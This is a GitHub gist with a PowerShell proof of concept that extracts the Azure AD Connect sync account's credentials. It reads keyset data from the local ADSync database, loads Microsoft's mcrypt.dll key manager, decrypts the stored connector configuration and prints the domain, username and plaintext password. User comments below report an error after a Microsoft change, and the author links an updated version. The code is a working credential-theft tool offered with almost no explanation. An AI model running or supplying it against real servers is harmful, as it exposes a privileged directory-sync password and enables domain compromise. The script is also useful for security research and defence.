-
-
Save xpn/0dc393e944d8733e3c63023968583545 to your computer and use it in GitHub Desktop.
Write-Host "AD Connect Sync Credential Extract POC (@_xpn_)`n" | |
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync" | |
$client.Open() | |
$cmd = $client.CreateCommand() | |
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration" | |
$reader = $cmd.ExecuteReader() | |
$reader.Read() | Out-Null | |
$key_id = $reader.GetInt32(0) | |
$instance_id = $reader.GetGuid(1) | |
$entropy = $reader.GetGuid(2) | |
$reader.Close() | |
$cmd = $client.CreateCommand() | |
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'" | |
$reader = $cmd.ExecuteReader() | |
$reader.Read() | Out-Null | |
$config = $reader.GetString(0) | |
$crypted = $reader.GetString(1) | |
$reader.Close() | |
add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll' | |
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager | |
$km.LoadKeySet($entropy, $instance_id, $key_id) | |
$key = $null | |
$km.GetActiveCredentialKey([ref]$key) | |
$key2 = $null | |
$km.GetKey(1, [ref]$key2) | |
$decrypted = $null | |
$key2.DecryptBase64ToString($crypted, [ref]$decrypted) | |
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}} | |
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}} | |
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}} | |
Write-Host ("Domain: " + $domain.Domain) | |
Write-Host ("Username: " + $username.Username) | |
Write-Host ("Password: " + $password.Password) |
It is not working anymore. I am getting error on line 24, even after corrected quote on line 22
PS C:\Program Files\Microsoft Azure AD Sync\bin> add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
PS C:\Program Files\Microsoft Azure AD Sync\bin> $km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
PS C:\Program Files\Microsoft Azure AD Sync\bin> $km.LoadKeySet($entropy, $instance_id, $key_id)
Exception calling "LoadKeySet" with "3" argument(s): "The system cannot find the file specified. (Exception from HRESULT: 0x80070002)"
At line:1 char:1
- $km.LoadKeySet($entropy, $instance_id, $key_id)
-
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : FileNotFoundException
Microsoft look like they made a few changes to how the keys are stored. New script is up which shows one way around this https://gist.github.com/xpn/f12b145dba16c2eebdd1c6829267b90c
typo on line 22: closing quote should be the same as opening...